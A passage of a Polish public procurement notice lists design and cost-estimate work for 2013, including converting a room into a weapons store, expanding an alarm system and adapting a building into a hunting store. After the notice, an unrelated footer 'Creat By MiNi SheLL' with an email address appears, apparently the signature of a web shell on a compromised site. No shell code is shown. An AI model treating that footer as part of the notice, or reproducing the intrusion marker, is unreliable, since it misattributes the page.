g) informację dotyczącą bezpieczeństwa i ochrony zdrowia; 
i) inne niezbędne opinie, uzgodnienia - w tym z wymogami prawa wodnego z dnia 18 lipca 2001r., (tj. Dz. U. z 2012r., poz. 145 ze zm.) i sprawdzenie projektów (nie dotyczy uzyskania: 
- decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, 
- zgłoszenia robót budowlanych). 
2. Opracowanie specyfikacji technicznej wykonania i odbioru robót - 2 egz. 
3. Opracowanie operatu wodno-prawnego - 2 egz.
4. Opracowanie kosztorysu inwestorskiego i ofertowego - 2 egz.
5. Wszystkie elementy dokumentacji, rozwiązania techniczne należy opracować również w formie elektronicznej, w postaci plików ogólnodostępnych (format PDF) - zapisane na nośniku trwałym (CD lub DVD) - 1 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie uproszczonej dokumentacji projektowo - kosztorysowej:  
a) Adaptacji budynku biura n-ctwa nr inw 105/5 - pomieszczania na magazyn broni,
b) Rozbudowy instalacji alarmowej nr inw. 624/468 w bud. biura n-ctwa - magazyn broni,
c) Adaptacji budynku nr inw . 108/65 na magazyn OHZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie uproszczonej dokumentacji projektowo - kosztorysowej :
1) Adaptacji budynku biura n-ctwa nr inw 105/5 - pomieszczania na magazyn broni,  w tym: wykonanie ścianki działowej, tynków, terakoty, wybicie otworu w ścianie, montaż drzwi, wykonanie instalacji elektrycznej z osprzętem, ogrzewanie, roboty ogólnobudowlane.
2) Rozbudowa instalacji alarmowej nr inw. 624/468 w bud. biura n-ctwa. Rozbudowa istniejącego systemu alarmowego o monitoring pomieszczenia przeznaczonego magazyn broni oraz pracy kotłowni gazowej, roboty ogólnobudowlane.
3) Adaptacja budynku nr inw . 108/65 na magazyn OHZ, w zakresie wstawienia drzwi drewnianych dwuskrzydłowych rozwieralnych, roboty ogólnobudowlane.
W zakres prac objętych zamówieniem wchodzi: 
1. Wykonanie dokumentacji projektowej - 4 egz., 
1.1. zgodnie z: 
a) Ustawą z dnia 07 lipca 1994r., - Prawo budowlane (tj. Dz. U. z 2010r., Nr 243, poz. 1623, ze zm.), 
b) Rozporządzeniem Ministra Infrastruktury z dnia 03 lipca 2003r., w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003r., nr 120, poz. 1133  ze zm.), 
c) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r., w sprawie szczegółowego zakresu i formy zakresu dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. z 2004r., Nr 202, poz. 2072 ze zm.), 
d) Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003r., w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r., nr 120, poz. 1126).
1.2. zawierającej między innymi: 
a) projekt architektoniczno - budowlany w zakresie uwzględniającym specyfikę robót budowlanych; 
b) projekt wykonawczy;
c) przedmiar robót; 
d) informację dotyczącą bezpieczeństwa i ochrony zdrowia; 
e) inne niezbędne opinie, uzgodnienia i sprawdzenie projektów (nie dotyczy zgłoszenia robót budowlanych). 
2. Opracowanie specyfikacji technicznej wykonania i odbioru robót - 2 egz. 
3. Opracowanie kosztorysu inwestorskiego i ofertowego - 2 egz.
4. Wszystkie elementy dokumentacji, rozwiązania techniczne należy opracować również w formie elektronicznej, w postaci plików ogólnodostępnych (format PDF) - zapisane na nośniku trwałym (CD lub DVD) - 1 egz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com